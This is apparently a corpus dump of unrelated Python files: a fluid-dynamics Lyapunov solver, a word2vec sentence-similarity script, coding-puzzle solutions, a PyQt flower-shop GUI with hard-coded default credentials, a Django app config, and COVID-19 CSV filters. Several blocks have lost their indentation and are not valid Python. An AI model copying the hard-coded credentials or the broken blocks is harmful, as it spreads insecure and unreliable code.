    nSteps: number of time steps; time: trajectory start time; trjdir:
    directory holding the reference primal trajectory snapshots.
    Writes the renormalized tangent field each step and returns the
    accumulated exponent estimate.
    """
    dt = runner.dt
    eps = 1.e-6                      # finite-difference perturbation size
    parameter = 0.0
    primalFieldOrig = runner.readFields(trjdir, time)
    tanDir = runner.base + 'temp/' + 'tangent/'
    lyap_exp = 0.
    if not os.path.exists(tanDir):
        os.makedirs(tanDir)
    for i in range(nSteps):
        # advance the perturbed state one step with the primal solver
        primalFieldPert = primalFieldOrig + eps*tanField
        primalFieldPert, _ = runner(primalFieldPert, parameter,\
                1, 'tempPrimal')
        time += dt
        # reference state at the new time comes from the stored trajectory
        primalFieldOrig = runner.readFields(trjdir, time)
        # finite-difference tangent, then renormalize (power iteration)
        tanField = (primalFieldPert - primalFieldOrig)/eps
        norm_tan = np.linalg.norm(tanField)
        tanField /= norm_tan
        # average log growth rate per unit time
        lyap_exp += np.log(norm_tan)/(dt*nSteps)
        print("time, lyap_exp", time, lyap_exp)
        runner.writeFields(tanField, tanDir, time)
    return lyap_exp
def solve_unstable_adjoint(runner, adjField, nSteps, initTime,\
        finalTime, parameter, case):
    """Adjoint analogue of solve_unstable_tangent (work in progress).

    Runs one adjoint step from the primal state at finalTime, then halts.
    NOTE(review): `initTime` and `dt` are currently unused; the
    renormalization/accumulation steps are still commented out, so the
    returned lyap_exp is always 0.
    """
    dt = runner.dt
    primalField = runner.readFields(case, finalTime)
    adjDir = runner.base + 'temp/' + 'adjoint'
    lyap_exp = 0.
    if not os.path.exists(adjDir):
        os.makedirs(adjDir)
    for i in range(nSteps):
        adjField = runner.adjoint(primalField, parameter,\
                1, adjField, 'adjoint')
        # deliberate NameError: halts execution after the first adjoint
        # step (debugging scaffold left in on purpose, it seems)
        stop
        #norm_adj = np.linalg.norm(adjField)
        #adjField /= norm_adj
        #lyap_exp += np.log(norm_tan)/nSteps
        #runner.writeFields(tanField, tanDir, time)
        #time += dt
        #primalFieldOrig = runner.readFields(case, time)
    return lyap_exp
def main():
    """Driver: configure the S3 runner for the slab_60_fds case and run a
    single unstable-adjoint step.

    NOTE(review): nSteps, nExponents, runUpSteps, checkpointPath and runId
    are set but unused on the active code path; the tangent-solve path is
    commented out.
    """
    base = '/master/home/nishac/adFVM/cases/slab_60_fds/'
    time = 30.0
    dt = 1e-4
    template = '/master/home/nishac/adFVM/templates/slab_60_fds.py'
    nProcs = 1
    runner = S3(base, time, dt, template, nProcs=nProcs, flags=['-g', '--gpu_double'])
    #s3sens = map_sens.Sensitivity
    nSteps = 6000
    nExponents = 1
    runUpSteps = 0
    parameter = 0.0
    checkpointPath = base + 'checkpoint/'
    trjdir = base + 'temp/' + 'primal/'
    time = 30.0
    # initial condition read from the case base directory at t = 30.0
    initField = runner.readFields(base, time)
    runId = 'primal'
    #outField = runner(initField, parameter, nSteps, runId)
    #tanInit = np.ones(initField.shape[0])
    #tanInit /= np.linalg.norm(tanInit)
    #le = solve_unstable_tangent(runner, tanInit, nSteps, time, trjdir)
    #print(le)
    initTime = 30.0
    finalTime = initTime + dt
    # random initial adjoint field, same size as the primal state
    adjField = np.random.rand(initField.shape[0])
    le = solve_unstable_adjoint(runner, adjField, 1, initTime,\
            finalTime, parameter, trjdir)
# Script entry point.
if __name__ == '__main__':
    main()
|
#-*- coding: utf-8 -*-
# coding:utf-8
import jieba
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import math
import gensim
import numpy as np
def cos_dist(a, b):
    """Cosine similarity of two equal-length numeric sequences.

    Returns None when the lengths differ or when either vector has zero
    norm (similarity undefined).
    """
    if len(a) != len(b):
        return None
    dot = sum(x * y for x, y in zip(a, b))
    norm_sq_a = sum(x * x for x in a)
    norm_sq_b = sum(y * y for y in b)
    denom = math.sqrt(norm_sq_a * norm_sq_b)
    if denom == 0.0:
        return None
    return dot / denom
def _avg_word_vec(model, sentence):
    """Mean 256-dim word2vec vector of the jieba tokens of *sentence*.

    Out-of-vocabulary words contribute a zero vector. An empty token
    stream returns the zero vector (the original code divided by the
    token count and raised ZeroDivisionError for empty sentences).
    """
    count = 0
    acc = np.zeros(256, dtype=np.float32)
    for word in jieba.cut(sentence):
        try:
            c = model[word]
        except KeyError:
            print ('not in vocabulary')
            c = np.zeros(256, dtype=np.float32)
        acc = acc + c
        count += 1
    if count == 0:
        return acc
    return acc / count
def process(inpath, outpath):
    """Label tab-separated sentence pairs by word2vec cosine similarity.

    Each input line is "<lineno>\t<sen1>\t<sen2>"; the output line is
    "<lineno>\t1" when the similarity of the averaged word vectors
    exceeds 0.8, else "<lineno>\t0". (The duplicated per-sentence loop
    from the original is factored into _avg_word_vec.)
    """
    model = gensim.models.Word2Vec.load('word2vec_wx')
    with open(inpath, 'r') as fin, open(outpath, 'w') as fout:
        for line in fin:
            lineno, sen1, sen2 = line.strip().split('\t')
            r = cos_dist(_avg_word_vec(model, sen1), _avg_word_vec(model, sen2))
            # cos_dist returns None for zero vectors; count that as
            # dissimilar (matches the old Python 2 `None > 0.8` == False,
            # and avoids a TypeError under Python 3)
            if r is not None and r > 0.8:
                fout.write(lineno + '\t1\n')
            else:
                fout.write(lineno + '\t0\n')
# CLI: python <script> <input_tsv> <output_tsv>
if __name__ == '__main__':
    process(sys.argv[1], sys.argv[2])
|
import sys
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
if test:
xua, yua, xla, yla, xub, yub, xlb, ylb = (int(i) for i in test.split(','))
range_x_a = set(xrange(xua, xla + 1))
range_y_a = set(xrange(yla, yua + 1))
range_x_b = set(xrange(xub, xlb + 1))
range_y_b = set(xrange(ylb, yub + 1))
print True if (range_x_a & range_x_b) and (range_y_a & range_y_b) else False
test_cases.close()
|
# prompt: https://www.hackerrank.com/challenges/ctci-ice-cream-parlor/problem
import sys
def solve(arr, money):
    """Print the 1-based indices of the first two flavors in *arr* whose
    costs sum to *money* (single-pass hash-map lookup); prints nothing
    when no such pair exists."""
    seen = {}
    for i, cost in enumerate(arr):
        complement = money - cost
        if complement in seen:
            print(seen[complement] + 1, i + 1)
            return
        seen[cost] = i
if __name__ == "__main__":
t = int(input().strip())
for a0 in range(t):
money = int(input().strip())
n = int(input().strip())
arr = list(map(int, input().strip().split(' ')))
solve(arr, money)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainv3.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sqlite3
import os
import sys
#this part enables the relative path of the modules for importing
path=os.path.dirname(__file__)
fullpath=os.path.join(path,'BLL')
sys.path.append(fullpath)
sys.path.append('DAL')
from Get_User import GetUserInfo
from mainButtonControl import ButtonControl
# PyQt4-era compatibility shim kept by the .ui generator: PyQt5 removed
# QApplication.UnicodeUTF8, so under PyQt5 the AttributeError branch
# defines the 3-argument _translate wrapper.
try:
    _encoding = QtWidgets.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtCore.QCoreApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtCore.QCoreApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Flower-shop main window (generated from mainv3.ui, then hand-extended).

    Left table: the customer's cart; right table: items in stock.
    '<' moves one unit from stock into the cart, '>' moves one unit back.
    Database/dialog work is delegated to ButtonControl and GetUserInfo.
    """
    #the init function is used to send the user and password to this form
    def __init__(self, gUser="cheng",gPass="1234"):# TODO(review): hard-coded default credentials -- remove
        self.obj=GetUserInfo(gUser,gPass)
        self.user=self.obj.getUser()
        # first column of the first returned row is the user's id
        self.UserID=self.user[0][0]
    def setupUi(self, MainWindow):
        """Build all widgets, lay them out, and wire signals to handlers."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(915, 669)
        MainWindow.setEnabled(True) #to enable background in the GUI
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName("gridLayout")
        self.label_stock = QtWidgets.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(16)
        self.label_stock.setFont(font)
        self.label_stock.setAlignment(QtCore.Qt.AlignCenter)
        self.label_stock.setObjectName("label_stock")
        self.gridLayout.addWidget(self.label_stock, 0, 3, 1, 2)
        self.btn_Great = QtWidgets.QPushButton(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.btn_Great.sizePolicy().hasHeightForWidth())
        self.btn_Great.setSizePolicy(sizePolicy)
        self.btn_Great.setObjectName("btn_Great")
        self.gridLayout.addWidget(self.btn_Great, 4, 2, 1, 1)
        self.btn_Reset = QtWidgets.QPushButton(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.btn_Reset.sizePolicy().hasHeightForWidth())
        self.btn_Reset.setSizePolicy(sizePolicy)
        self.btn_Reset.setObjectName("btn_Reset")
        self.gridLayout.addWidget(self.btn_Reset, 5, 0, 1, 2)
        self.btn_Load = QtWidgets.QPushButton(self.centralwidget)
        self.btn_Load.setObjectName("btn_Load")
        self.gridLayout.addWidget(self.btn_Load, 5, 3, 1, 2)
        # cart table: 3 columns (Name, Quantity, Price)
        self.tableWidget_Cart = QtWidgets.QTableWidget(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.tableWidget_Cart.sizePolicy().hasHeightForWidth())
        self.tableWidget_Cart.setSizePolicy(sizePolicy)
        self.tableWidget_Cart.setObjectName("tableWidget_Cart")
        self.tableWidget_Cart.setColumnCount(3)
        self.tableWidget_Cart.setRowCount(0)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_Cart.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_Cart.setHorizontalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_Cart.setHorizontalHeaderItem(2, item)
        self.tableWidget_Cart.horizontalHeader().setMinimumSectionSize(49)
        self.gridLayout.addWidget(self.tableWidget_Cart, 3, 0, 2, 2)
        self.label_Total = QtWidgets.QLabel(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_Total.sizePolicy().hasHeightForWidth())
        self.label_Total.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(16)
        self.label_Total.setFont(font)
        self.label_Total.setAlignment(QtCore.Qt.AlignCenter)
        self.label_Total.setObjectName("label_Total")
        self.gridLayout.addWidget(self.label_Total, 6, 0, 1, 3)
        self.lineEdit_Search = QtWidgets.QLineEdit(self.centralwidget)
        self.lineEdit_Search.setObjectName("lineEdit_Search")
        self.gridLayout.addWidget(self.lineEdit_Search, 2, 3, 1, 1)
        self.btn_Search = QtWidgets.QPushButton(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.btn_Search.sizePolicy().hasHeightForWidth())
        self.btn_Search.setSizePolicy(sizePolicy)
        self.btn_Search.setObjectName("btn_Search")
        self.gridLayout.addWidget(self.btn_Search, 2, 4, 1, 1)
        self.btn_Less = QtWidgets.QPushButton(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.btn_Less.sizePolicy().hasHeightForWidth())
        self.btn_Less.setSizePolicy(sizePolicy)
        self.btn_Less.setObjectName("btn_Less")
        self.gridLayout.addWidget(self.btn_Less, 3, 2, 1, 1)
        self.btn_Purchase = QtWidgets.QPushButton(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.btn_Purchase.sizePolicy().hasHeightForWidth())
        self.btn_Purchase.setSizePolicy(sizePolicy)
        self.btn_Purchase.setObjectName("btn_Purchase")
        self.gridLayout.addWidget(self.btn_Purchase, 7, 1, 1, 1)
        # stock table: 3 columns (Name, Number available, Price per piece)
        self.tableWidget_Stock = QtWidgets.QTableWidget(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.tableWidget_Stock.sizePolicy().hasHeightForWidth())
        self.tableWidget_Stock.setSizePolicy(sizePolicy)
        self.tableWidget_Stock.setObjectName("tableWidget_Stock")
        self.tableWidget_Stock.setColumnCount(3)
        self.tableWidget_Stock.setRowCount(0)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_Stock.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_Stock.setHorizontalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.tableWidget_Stock.setHorizontalHeaderItem(2, item)
        self.tableWidget_Stock.horizontalHeader().setMinimumSectionSize(49)
        self.gridLayout.addWidget(self.tableWidget_Stock, 3, 3, 2, 2)
        self.label_4 = QtWidgets.QLabel(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_4.sizePolicy().hasHeightForWidth())
        self.label_4.setSizePolicy(sizePolicy)
        self.label_4.setObjectName("label_4")
        self.gridLayout.addWidget(self.label_4, 2, 0, 1, 1)
        self.label_cart = QtWidgets.QLabel(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_cart.sizePolicy().hasHeightForWidth())
        self.label_cart.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setFamily("Arial")
        font.setPointSize(16)
        self.label_cart.setFont(font)
        self.label_cart.setAlignment(QtCore.Qt.AlignCenter)
        self.label_cart.setObjectName("label_cart")
        self.gridLayout.addWidget(self.label_cart, 0, 0, 1, 2)
        self.lineEdit_Search.raise_()
        self.btn_Search.raise_()
        self.btn_Great.raise_()
        self.btn_Reset.raise_()
        self.btn_Load.raise_()
        self.label_stock.raise_()
        self.tableWidget_Cart.raise_()
        self.label_cart.raise_()
        self.tableWidget_Stock.raise_()
        self.label_Total.raise_()
        self.btn_Purchase.raise_()
        self.label_4.raise_()
        self.btn_Less.raise_()
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 915, 26))
        self.menubar.setObjectName("menubar")
        self.menuUser = QtWidgets.QMenu(self.menubar)
        self.menuUser.setObjectName("menuUser")
        self.menuHelp = QtWidgets.QMenu(self.menubar)
        self.menuHelp.setObjectName("menuHelp")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.actionAbout = QtWidgets.QAction(MainWindow)
        self.actionAbout.setObjectName("actionAbout")
        self.actionHelp = QtWidgets.QAction(MainWindow)
        self.actionHelp.setObjectName("actionHelp")
        self.actionAccount_info = QtWidgets.QAction(MainWindow)
        self.actionAccount_info.setObjectName("actionAccount_info")
        self.menuUser.addAction(self.actionAccount_info)
        self.menuHelp.addAction(self.actionAbout)
        self.menuHelp.addAction(self.actionHelp)
        self.menubar.addAction(self.menuUser.menuAction())
        self.menubar.addAction(self.menuHelp.menuAction())
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
        ##### hand-written customization below (background, read-only tables,
        ##### column resize modes, and signal wiring)
        MainWindow.setStyleSheet("#MainWindow { border-image: url(Flower_main2.jpg) 0 0 0 0 stretch stretch; }")
        self.tableWidget_Cart.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        self.tableWidget_Stock.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        header = self.tableWidget_Stock.horizontalHeader()
        header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
        header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)
        header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)
        header = self.tableWidget_Cart.horizontalHeader()
        header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
        header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)
        header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)
        self.btn_Load.clicked.connect(self.btn_load_clicked)
        self.btn_Less.clicked.connect(self.btn_lessthan_clicked)
        self.btn_Reset.clicked.connect(self.btn_reset_clicked)
        self.btn_Great.clicked.connect(self.btn_greaterthan_clicked)
        self.btn_Purchase.clicked.connect(self.btn_purchase_clicked)
        self.actionAccount_info.triggered.connect(self.account_info_clicked)
        self.actionAbout.triggered.connect(self.About_clicked)
        self.actionHelp.triggered.connect(self.Help_clicked)
        self.btn_Search.clicked.connect(self.btn_search_clicked)
    def btn_load_clicked(self):# this part loads the database into the stock table
        result, connection, cursor=ButtonControl.loadData()
        self.tableWidget_Stock.setRowCount(0)
        for row_number, row_data in enumerate(result): #iteration for inputting the database into the table
            self.tableWidget_Stock.insertRow(row_number)
            for column_number, data in enumerate(row_data):
                self.tableWidget_Stock.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
        cursor.close()
        connection.close()
    def btn_search_clicked(self):
        """Fill the stock table with rows matching the search text."""
        result, connection, cursor=ButtonControl.searchButton(self.lineEdit_Search.text())
        self.tableWidget_Stock.setRowCount(0)
        for row_number, row_data in enumerate(result):
            self.tableWidget_Stock.insertRow(row_number)
            for column_number, data in enumerate(row_data):
                self.tableWidget_Stock.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
        cursor.close()
        connection.close()
    # the next three methods are for the menubar
    def Help_clicked(self):
        ButtonControl.helpButton()
    def About_clicked(self):
        ButtonControl.aboutButton()
    def account_info_clicked(self):
        self.obj.accountInfo()
    def btn_lessthan_clicked(self):
        """'<' button: move one unit of the selected stock row into the cart."""
        self.rowPosition = self.tableWidget_Cart.rowCount() #gives rowPos the current rowcount
        self.selectedRow=self.tableWidget_Stock.currentRow() #gives selectedrow the currently clicked row's index
        col1=self.tableWidget_Stock.item(self.selectedRow,0) #selects the item at the current row, and column
        col2=self.tableWidget_Stock.item(self.selectedRow,1)
        col3=self.tableWidget_Stock.item(self.selectedRow,2)
        #update the price and quantity if the item is already in the cart
        dup=False
        rowCtr=0
        while rowCtr!=self.tableWidget_Cart.rowCount():
            if self.tableWidget_Cart.item(rowCtr,0).text()==self.tableWidget_Stock.item(self.selectedRow,0).text():
                dup=True
                quantity=int(self.tableWidget_Cart.item(rowCtr,1).text())
                if quantity ==int(self.tableWidget_Stock.item(self.selectedRow,1).text()):
                    ButtonControl.lessThanError(0) #error when the user is getting more item than available
                else:
                    self.tableWidget_Cart.setItem(rowCtr , 1, QtWidgets.QTableWidgetItem(str(quantity+1)))
                    self.itemPrice=float(col3.text())
                    newPrice=self.itemPrice*(quantity+1)
                    self.tableWidget_Cart.setItem(rowCtr , 2, QtWidgets.QTableWidgetItem(str(newPrice)))
                break
            rowCtr+=1
        #insert a new row if the item is not yet in the cart
        if dup==False:
            if int(self.tableWidget_Stock.item(self.selectedRow,1).text())==0:
                ButtonControl.lessThanError(1)
            else:
                self.tableWidget_Cart.insertRow(self.rowPosition) #insert a new row
                self.tableWidget_Cart.setItem(self.rowPosition , 0, QtWidgets.QTableWidgetItem(col1.text())) #insert item at the current row and col
                self.tableWidget_Cart.setItem(self.rowPosition , 1, QtWidgets.QTableWidgetItem("1"))
                self.tableWidget_Cart.setItem(self.rowPosition , 2, QtWidgets.QTableWidgetItem(col3.text()))
        self.UpdatePrice()
    def btn_greaterthan_clicked(self): #return item from the cart to the stock table
        """'>' button: decrement the selected cart row, removing it at quantity 1."""
        if self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),1)==None:
            return
        else:
            if int(self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),1).text())>1:
                quantity=int(self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),1).text())-1
                self.tableWidget_Cart.setItem(self.tableWidget_Cart.currentRow() , 1, QtWidgets.QTableWidgetItem(str(quantity)))
                # recover the unit price from the current line total
                newPrice=(float(self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),2).text()))/(quantity+1)
                newPrice=newPrice*quantity
                self.tableWidget_Cart.setItem(self.tableWidget_Cart.currentRow() , 2, QtWidgets.QTableWidgetItem(str(newPrice)))
            else:
                self.tableWidget_Cart.removeRow(self.tableWidget_Cart.currentRow())
            self.UpdatePrice()
    def btn_reset_clicked(self): #empty the cart table
        self.tableWidget_Cart.setRowCount(0)
        self.label_Total.setText("Total amount in cart:0.0")
    def btn_purchase_clicked(self): #this updates the database, reloads the stock table, and resets the cart table.
        """Commit the cart via ButtonControl.checkCart, then refresh the UI.

        NOTE(review): relies on self.price having been set by UpdatePrice
        (true whenever the cart is non-empty) — confirm no other path adds rows.
        """
        if self.tableWidget_Cart.rowCount()==0:
            ButtonControl.checkCart(True,0,0,0)
        else:
            rowCount=0
            itemID=""
            while rowCount<self.tableWidget_Cart.rowCount():
                itemID=itemID+ButtonControl.itemID(self.tableWidget_Cart.item(rowCount,0).text(),self.tableWidget_Cart.item(rowCount,1).text())
                rowCount=rowCount+1
            # NOTE(review): 'calcel' is a typo for 'cancel'; the value is
            # unused and immediately overwritten on the next line
            calcel=False
            cancel=ButtonControl.checkCart(False,self.price,self.UserID,itemID)
            if cancel==False:
                self.btn_load_clicked()
                self.btn_reset_clicked()
    def UpdatePrice(self): #update the price in the GUI.
        ctr=self.tableWidget_Cart.rowCount()
        self.price=0.00
        while ctr!=0:
            self.price=self.price+float(self.tableWidget_Cart.item(ctr-1,2).text())
            ctr=ctr-1
        self.label_Total.setText("Total amount in cart:"+str(self.price))
    def retranslateUi(self, MainWindow):
        """Set all user-visible strings (generated code)."""
        MainWindow.setWindowTitle(_translate("MainWindow", "Flower Shop", None))
        self.label_stock.setText(_translate("MainWindow", "Available in stock", None))
        self.btn_Great.setText(_translate("MainWindow", ">", None))
        self.btn_Reset.setText(_translate("MainWindow", "Reset", None))
        self.btn_Load.setText(_translate("MainWindow", "Load", None))
        item = self.tableWidget_Cart.horizontalHeaderItem(0)
        item.setText(_translate("MainWindow", "Name", None))
        item = self.tableWidget_Cart.horizontalHeaderItem(1)
        item.setText(_translate("MainWindow", "Quantity", None))
        item = self.tableWidget_Cart.horizontalHeaderItem(2)
        item.setText(_translate("MainWindow", "Price", None))
        self.label_Total.setText(_translate("MainWindow", "Total amount in cart: P 0.00", None))
        self.btn_Search.setText(_translate("MainWindow", "Search", None))
        self.btn_Less.setText(_translate("MainWindow", "<", None))
        self.btn_Purchase.setText(_translate("MainWindow", "Purchase", None))
        item = self.tableWidget_Stock.horizontalHeaderItem(0)
        item.setText(_translate("MainWindow", "Name", None))
        item = self.tableWidget_Stock.horizontalHeaderItem(1)
        item.setText(_translate("MainWindow", "Number available", None))
        item = self.tableWidget_Stock.horizontalHeaderItem(2)
        item.setText(_translate("MainWindow", "Price per piece", None))
        self.label_4.setText(_translate("MainWindow", " ", None))
        self.label_cart.setText(_translate("MainWindow", "Cart", None))
        self.menuUser.setTitle(_translate("MainWindow", "User", None))
        self.menuHelp.setTitle(_translate("MainWindow", "Help", None))
        self.actionAbout.setText(_translate("MainWindow", "About", None))
        self.actionHelp.setText(_translate("MainWindow", "Help", None))
        self.actionAccount_info.setText(_translate("MainWindow", "Account info", None))
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
from django.apps import AppConfig
class ContaCorrenteConfig(AppConfig):
    """Django app configuration for the 'conta_corrente' (checking account) app."""
    name = 'conta_corrente'
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 2 10:55:54 2020
@author: Administrator
"""
import csv
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.dates as mdate
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
from matplotlib.ticker import FormatStrFormatter
#用reader读取csv文件
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_same_province(str, Province):
    """True for the CN province-level summary row whose provinceCode equals *Province*.

    *str* is a csv row: [date, country, countryCode, province, provinceCode,
    city, cityCode, confirmed, suspected, cured, dead]. Despite the
    parameter name, callers pass a province *code* such as '420000'.
    """
    # column 4 is provinceCode; an empty city marks the province summary row
    return str[2] == 'CN' and str[4] == Province and str[5] == ''
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_same_country(str, Country):
    """True for the national-level summary row whose countryCode equals *Country*.

    A national-level row has empty provinceCode (col 4) and city (col 5).
    """
    country_code, province_code, city = str[2], str[4], str[5]
    return country_code == Country and province_code == '' and city == ''
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_between_time(str, start):
    """True when the row's date (column 0, '%Y-%m-%d') equals *start*,
    a matplotlib date number; the csv header row yields False."""
    if str[0] == 'date':
        return False
    # NOTE(review): mdate.strpdate2num was removed in matplotlib >= 3.5 --
    # this module targets an older matplotlib
    to_num = mdate.strpdate2num('%Y-%m-%d')
    return to_num(str[0]) == float(start)
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_not_china(str, Country):
    """True for national-level rows whose countryCode differs from *Country*."""
    row_country, province_code, city = str[2], str[4], str[5]
    if row_country == Country:
        return False
    # national-level rows carry no provinceCode or city
    return province_code == '' and city == ''
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_not_Hubei(str, CountryCode):
    """True for province-level rows of *CountryCode* excluding Hubei ('420000')."""
    # a province-level row names a province (col 3) but no city (col 5)
    is_province_row = str[3] != '' and str[5] == ''
    return str[2] == CountryCode and is_province_row and str[4] != '420000'
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_country(str):
    """True when the row is a national-level summary: province, provinceCode,
    city and cityCode (columns 3-6) are all empty."""
    return all(str[col] == '' for col in (3, 4, 5, 6))
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
def is_china(str, Country):
    """True for the national-level summary row of countryCode *Country*
    (same predicate as is_same_country; kept for caller compatibility)."""
    matches_country = str[2] == Country
    is_national_row = str[4] == '' and str[5] == ''
    return matches_country and is_national_row
def filter_China(filename, resultfile, ProvinceCode):
    """Copy to *resultfile* the rows of *filename* whose provinceCode
    matches *ProvinceCode* (CN province-level summary rows only).

    Fix: the input file was opened inline inside csv.reader and never
    closed; both files are now managed by context managers.
    """
    with open(filename, encoding='utf-8') as filetoread, \
         open(resultfile, 'w', newline='', encoding='utf-8') as filetowrite:
        writer = csv.writer(filetowrite)
        for line in csv.reader(filetoread):
            if is_same_province(line, ProvinceCode):
                writer.writerow(line)
def filter_foreign(filename, resultfile, CountryCode):
    """Copy to *resultfile* the national-level rows of *filename* whose
    countryCode matches *CountryCode*.

    Fix: the input file was opened inline inside csv.reader and never
    closed; both files are now managed by context managers.
    """
    with open(filename, encoding='utf-8') as filetoread, \
         open(resultfile, 'w', newline='', encoding='utf-8') as filetowrite:
        writer = csv.writer(filetowrite)
        for line in csv.reader(filetoread):
            if is_same_country(line, CountryCode):
                writer.writerow(line)
def confirm_date(date1, text1):
    """Number of whole days from *text1* (a matplotlib date number) up to
    *date1* (a '%Y-%m-%d' string); 0 when date1 is not after text1."""
    to_num = mdate.strpdate2num('%Y-%m-%d')
    target = to_num(date1)          # hoisted: invariant across iterations
    n = 0
    while target > float(text1 + n):
        n += 1
    return n
#date,country,countryCode,province,provinceCode,city,cityCode,confirmed,suspected,cured,dead
#0 1 2 3 4 5 6 7 8 9 10
